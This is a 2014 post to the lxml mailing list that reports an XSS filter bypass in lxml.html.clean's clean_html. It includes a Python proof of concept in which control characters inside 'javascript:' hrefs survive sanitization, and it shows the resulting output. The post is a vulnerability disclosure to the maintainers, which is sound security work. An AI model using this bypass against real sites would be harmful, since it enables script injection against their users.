[lxml] lxml.html.clean vulnerability

Максим Кочкин maxxarts at gmail.com
Tue Apr 15 18:33:49 UTC 2014


Hi, guys.

I've accidentally found vulnerability in clean_html function. User can
break schema of url with nonprinted chars (\x01-\x08). Here is PoC.


from lxml.html.clean import clean_html

html = '''\
<html>
<body>
<a href="javascript:alert(0)">aaa</a>
<a href="javas\x01cript:alert(1)">bbb</a>
<a href="javas\x02cript:alert(1)">bbb</a>
<a href="javas\x03cript:alert(1)">bbb</a>
<a href="javas\x04cript:alert(1)">bbb</a>
<a href="javas\x05cript:alert(1)">bbb</a>
<a href="javas\x06cript:alert(1)">bbb</a>
<a href="javas\x07cript:alert(1)">bbb</a>
<a href="javas\x08cript:alert(1)">bbb</a>
<a href="javas\x09cript:alert(1)">bbb</a>
</body>
</html>'''

print clean_html(html)


Output:

<div>
<body>
<a href="">aaa</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="">bbb</a>
</body>
</div>


I'm not a python programmer, so can't give you quick fix. Found it by
blackbox testing on one site that uses lxml. I'm not sure if it's bug or
maybe I just got things wrong.

----
ksimka (@m_ksimka)
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://mailman-mail5.webfaction.com/pipermail/lxml/attachments/20140415/7cda9b48/attachment.html>


More information about the lxml mailing list